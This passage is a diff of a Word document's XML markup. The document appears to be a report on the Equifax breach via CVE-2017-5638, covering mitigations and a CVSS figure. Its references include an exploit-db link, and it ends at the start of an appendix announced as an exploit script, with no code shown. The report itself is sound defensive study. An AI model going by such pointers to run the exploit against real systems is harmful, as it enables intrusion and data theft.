-        <w:t>approximately 145.5 million U.S. consumers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> along with several million Canadian and British residents. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">On the user’s end, mitigation involves freezing credit, changing home addresses, card numbers, phone numbers, and request of name change. At this point, the user would still be vulnerable to the Equifax breach and considering that the information applied to nearly a third of Americans, the only solace found can be that an individual’s identity can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8BD222" wp14:editId="5C018074">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>3009900</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="page">
+                  <wp:posOffset>4752975</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2924175" cy="243840"/>
+                <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="20250"/>
+                    <wp:lineTo x="21530" y="20250"/>
+                    <wp:lineTo x="21530" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="7" name="Text Box 7"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2924175" cy="243840"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="22"/>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:noProof/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>3</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> CVSS v3.0 Impact report concerning CVE-2017-5638</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:spAutoFit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="5D8BD222" id="Text Box 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:237pt;margin-top:374.25pt;width:230.25pt;height:19.2pt;z-index:-251646976;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:page;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="22"/>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:noProof/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>3</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> CVSS v3.0 Impact report concerning CVE-2017-5638</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight" anchory="page"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78C5ACF0" wp14:editId="6F674292">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="page">
+              <wp:posOffset>1247775</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="2924175" cy="3451225"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21461"/>
+                <wp:lineTo x="21530" y="21461"/>
+                <wp:lineTo x="21530" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect r="50801"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2924175" cy="3451225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hide amongst the crowd. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -507,7 +1905,8 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -525,27 +1924,30 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -559,6 +1961,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Mitigations</w:t>
       </w:r>
       <w:commentRangeEnd w:id="1"/>
@@ -574,7 +1977,49 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -592,14 +2037,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId10" w:history="1">
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -613,14 +2059,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId11" w:history="1">
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId14" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -634,14 +2081,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId12" w:history="1">
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -655,14 +2103,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId13" w:history="1">
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -676,14 +2125,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId14" w:history="1">
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId17" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -697,7 +2147,8 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
@@ -705,7 +2156,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId15" w:history="1">
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -720,15 +2171,2395 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=bh1gzJFVFLc</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=4pgg2LCY8iE</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.exploit-db.com/exploits/41570/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://nvd.nist.gov/vuln/detail/CV</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>E</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>-2017-5638</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Appendix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Python script similar to exploit carried out on parser for Equifax</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
